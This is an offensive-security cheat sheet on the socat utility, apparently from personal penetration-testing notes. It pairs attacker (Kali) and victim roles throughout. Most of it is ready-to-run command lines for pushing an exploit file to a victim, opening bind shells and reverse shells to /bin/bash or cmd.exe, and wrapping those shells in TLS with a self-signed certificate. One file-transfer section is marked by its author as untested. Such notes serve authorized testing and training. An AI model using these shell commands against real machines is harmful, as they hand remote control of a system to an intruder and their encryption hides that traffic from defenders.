Socat

Socat is a command line based utility that establishes two bidirectional byte streams and transfers data between them. Similar to Netcat but supports encryption.

Help

socat -h
socat -hh
socat -hhh
man socat

Client Mode

Connect to a TCP port

IP=x.x.x.x
PORT=443
socat - TCP4:$IP:$PORT

There is no feedback.

For interacting with a specific service, see Ports & Protocols

Server Mode (listen)

Use sudo for port numbers < 1024

sudo socat TCP4-LISTEN:443 STDOUT

File Transfer

Transfer file – From Server to Client

Server mode (e.g. Kali)

Anyone who connects to this port will receive the file.

sudo socat TCP4-LISTEN:443,fork file:~/exploit.py

Client mode (e.g. victim machine)

socat TCP4:$IP:443 file:received_exploit.py,create

Transfer file – From Client to Server

Tentative, to validate 😉 Says connection refused but file was created.

Server mode (e.g. Kali)

sudo socat TCP4-LISTEN:443 file:~/received_exploit.py,create

Client mode (e.g. victim machine)

socat TCP4:$IP:443,fork file:~/exploit.py,create

Bind Shell

Client –> Bind shell –> Server

Server mode (Victim)

sudo socat TCP4-LISTEN:443,fork EXEC:/bin/bash   # Linux
socat TCP4-LISTEN:443,fork EXEC:cmd.exe,pipes    # Windows

Client mode (Kali)

socat - TCP4:$IP:443

Encrypted Bind Shell

Server mode (Victim)

# Generate certificate for encryption, if applicable
openssl req -newkey rsa:2048 -nodes -keyout socat.key -x509 -days 362 -out socat.crt
cat socat.key socat.crt > socat.pem
sudo socat OPENSSL-LISTEN:443,cert=socat.pem,verify=0,fork EXEC:/bin/bash  # Linux
socat OPENSSL-LISTEN:443,cert=socat.pem,verify=0,fork EXEC:cmd.exe,pipes   # Windows

Client mode (Kali)

socat - OPENSSL:$IP:443,verify=0

Reverse Shell

Send a command shell to a host listening on a port.

Server mode (Kali)

-d -d: verbose

sudo socat -d -d TCP4-LISTEN:443 STDOUT

Client mode (Victim sends reverse shell to Kali)

socat TCP4:$IP:443 EXEC:/bin/bash       # Linux
socat TCP4:$IP:443 EXEC:cmd.exe,pipes   # Windows

If netcat is not available on victim’s machine, use other reverse shells. Also see the reverse shell cheat sheet from HighOnCoffee.

Encrypted Reverse Shell

Server mode (Kali)

# Generate certificate for encryption, if applicable
openssl req -newkey rsa:2048 -nodes -keyout socat.key -x509 -days 362 -out socat.crt
cat socat.key socat.crt > socat.pem
sudo socat -d -d OPENSSL-LISTEN:443,cert=socat.pem,verify=0 STDOUT

Client mode (Victim sends reverse shell to Kali)

socat OPENSSL:$IP:443,verify=0 EXEC:/bin/bash      # Linux
socat OPENSSL:$IP:443,verify=0 EXEC:cmd.exe,pipes  # Windows